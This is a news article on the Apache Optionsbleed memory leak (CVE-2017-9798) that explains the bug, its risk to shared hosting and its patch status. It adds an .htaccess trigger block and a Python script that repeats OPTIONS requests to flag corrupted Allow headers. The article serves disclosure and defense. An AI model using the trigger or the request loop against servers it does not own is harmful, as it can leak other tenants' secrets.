Apache Web Server Bug Can Allow Attackers to Dip into Memory Data

A vulnerability found in the Apache web server can allow attackers to obtain sensitive data stored in the server’s memory. The flaw can be triggered through .htaccess configuration files, so it poses the greatest risk to shared hosting environments that allow customers to create such files.
“If you run an Apache web server in a shared hosting environment that allows users to create .htaccess files you should drop everything you are doing right now, update immediately and make sure you restart the server afterward,” said security researcher Hanno Böck, who discovered the vulnerability. He dubbed it Optionsbleed because it is similar in concept to Heartbleed, a vulnerability found in OpenSSL three years ago that allowed attackers to extract memory contents from HTTPS-enabled web servers.
While similar to Heartbleed, Optionsbleed is much more limited in scope because it requires special conditions to be exploited. The bug is triggered when a server receives an HTTP OPTIONS request and its configuration contains a Limit directive that names an invalid (unregistered) HTTP method.
Most people are familiar with HTTP GET and POST, but these are just two of the request “methods” defined in the HTTP protocol. Another method is OPTIONS; a server that receives such a request answers with an Allow header listing the HTTP methods it accepts for the requested resource.
Administrators can restrict which HTTP methods are allowed for a resource by wrapping other directives in a Limit section that names the methods it applies to. Like most per-directory directives, it is accepted in .htaccess files when the server’s AllowOverride setting permits it.
“Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header,” Böck said in his report.
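The two fragments below are an added illustration, not taken from Böck’s report or from Apache: the first is the kind of .htaccess block a tenant could drop in to trigger the bug (the method name is made up; any name Apache does not register works), the second is a server-level setting that stops tenants from using Limit at all. The Limit container is accepted in .htaccess under both the Limit and AuthConfig override categories, so the hardened block grants neither; the directory path and the remaining override list are assumptions to adapt.

```apacheconf
# Trigger (tenant-controlled .htaccess, only honoured if AllowOverride permits it):
# a <Limit> section naming a method Apache does not know. Only the OPTIONS
# handler's Allow-header construction is affected, but the freed memory it reads
# belongs to the whole worker process, so the leak is not confined to this vhost.
<Limit BOGUSMETHOD>
    Require all denied
</Limit>

# Mitigation in the server configuration until httpd is patched: grant tenants
# only the override categories they need. Both "Limit" and "AuthConfig" would
# re-enable <Limit> blocks in .htaccess, so neither appears here. (Dropping
# AuthConfig also disables .htpasswd-style protection, so patching is still the
# real fix.)
<Directory "/var/www">
    AllowOverride FileInfo Indexes Options=Indexes,MultiViews
</Directory>
```

A Limit section with an invalid method in the main server configuration triggers the same code path, so an administrator should also grep their own configuration, not just tenant directories, before assuming the host is unaffected.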
If a vulnerable server is identified, attackers can repeatedly send OPTIONS requests to it in order to obtain data from the memory of the web server process. These memory chunks can include sensitive information that is being processed by the server at that time.
At first glance, the administrator of a web server would have no reason to set a Limit directive for a non-standard HTTP method, so the risk shouldn’t be that great. However, in shared hosting environments, where multiple users share the same web server and can create their own .htaccess files, the error can be triggered intentionally.
“The corruption is not limited to a single virtual host,” Böck said. “One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system.”
A scan performed by Böck across the Alexa Top Million websites, sending OPTIONS requests and inspecting the returned Allow headers, revealed 466 hosts with corrupted Allow headers.
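As an added example (not Böck’s scanner and not Apache code), the Python script below does what the two paragraphs above describe: it repeats OPTIONS requests against a host and flags Allow headers that do not look like a clean method list. The detection heuristics (empty list items, repeated or unknown method names, bytes that are not valid token characters) and the set of known methods are mine, the sample header values embedded for offline use are constructed, and the host, path and request count are parameters.

```python
"""Optionsbleed (CVE-2017-9798) check: repeat OPTIONS requests and flag Allow
headers that do not look like a clean method list.

Added example, not Böck's scanner or Apache code. Only fetch_allow_headers()
touches the network; everything else works on header values you pass in.
"""
import http.client
import re
from collections import Counter

# Methods a stock Apache (core plus mod_dav) may legitimately advertise.
KNOWN_METHODS = {
    "GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "OPTIONS", "TRACE", "PATCH",
    "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK",
    "VERSION-CONTROL", "CHECKOUT", "UNCHECKOUT", "CHECKIN", "UPDATE", "LABEL",
    "REPORT", "MKWORKSPACE", "MKACTIVITY", "BASELINE-CONTROL", "MERGE",
}
# RFC 7230 "token" characters: the only characters a method name may contain.
TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def allow_anomalies(value):
    """Return the anomalies in one Allow header value; [] means it looks clean.

    Garbage read from freed memory shows up as empty list items (",,"),
    repeated methods, unknown names, or bytes that are not token characters.
    """
    tokens = [t.strip() for t in value.split(",")]
    anomalies = ["empty token"] if "" in tokens else []
    seen = set()
    for tok in tokens:
        if not tok:
            continue
        if not TOKEN_RE.match(tok):
            note = "non-token characters: %r" % tok
        elif tok.upper() not in KNOWN_METHODS:
            note = "unknown method: %r" % tok
        elif tok in seen:
            note = "duplicate: %r" % tok
        else:
            note = None
        seen.add(tok)
        if note and note not in anomalies:
            anomalies.append(note)
    return anomalies


def assess(values):
    """Summarise the Allow headers collected from a batch of OPTIONS responses.

    Responses without an Allow header (None) are counted but not treated as
    corruption. A clean server answers identically every time, so variation is
    reported as a weaker hint (a load balancer can also cause it).
    """
    present = [v for v in values if v is not None]
    anomalies = []
    for v in present:
        for a in allow_anomalies(v):
            if a not in anomalies:
                anomalies.append(a)
    return {
        "responses": len(values),
        "with_allow": len(present),
        "distinct_values": len(Counter(present)),
        "anomalies": anomalies,
        "corrupted": bool(anomalies),
        "varies": len(Counter(present)) > 1,
    }


def fetch_allow_headers(host, path="/", count=100, https=True, timeout=5):
    """Send `count` OPTIONS requests on fresh connections, return each Allow header."""
    conn_cls = http.client.HTTPSConnection if https else http.client.HTTPConnection
    values = []
    for _ in range(count):
        conn = conn_cls(host, timeout=timeout)
        try:
            conn.request("OPTIONS", path, headers={"User-Agent": "optionsbleed-check"})
            resp = conn.getresponse()
            resp.read()
            values.append(resp.getheader("Allow"))
        finally:
            conn.close()
    return values


# Constructed sample batches (not captured from a real host) in the shape a
# healthy and a corrupted server would produce.
SAMPLE_CLEAN = ["GET,HEAD,POST,OPTIONS"] * 3
SAMPLE_CORRUPTED = [
    "GET,HEAD,OPTIONS,POST",
    "GET,HEAD,OPTIONS,,HEAD,,HEAD,POST",
    "GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD",
]

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    print(assess(fetch_allow_headers(target)))
```

Run it against your own hosts with the hostname as the first argument; a single "corrupted" verdict is enough to act on, because a clean Apache never emits empty or repeated entries in Allow. Treat "varies" on its own as a prompt to look closer rather than as proof.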
The vulnerability is tracked as CVE-2017-9798 and will be fixed in Apache httpd version 2.4.28, which hasn’t been released yet, but a manual patch is available. Multiple Linux distributions have already released patched packages, so check with your distribution maintainers and, as Böck stresses, restart httpd after updating, since running worker processes keep the old code until then.
It’s worth noting that the vulnerability also affects Apache 2.2, which has reached end-of-life and won’t receive an official fix. However, developer Thomas Deutschmann backported the patch for it.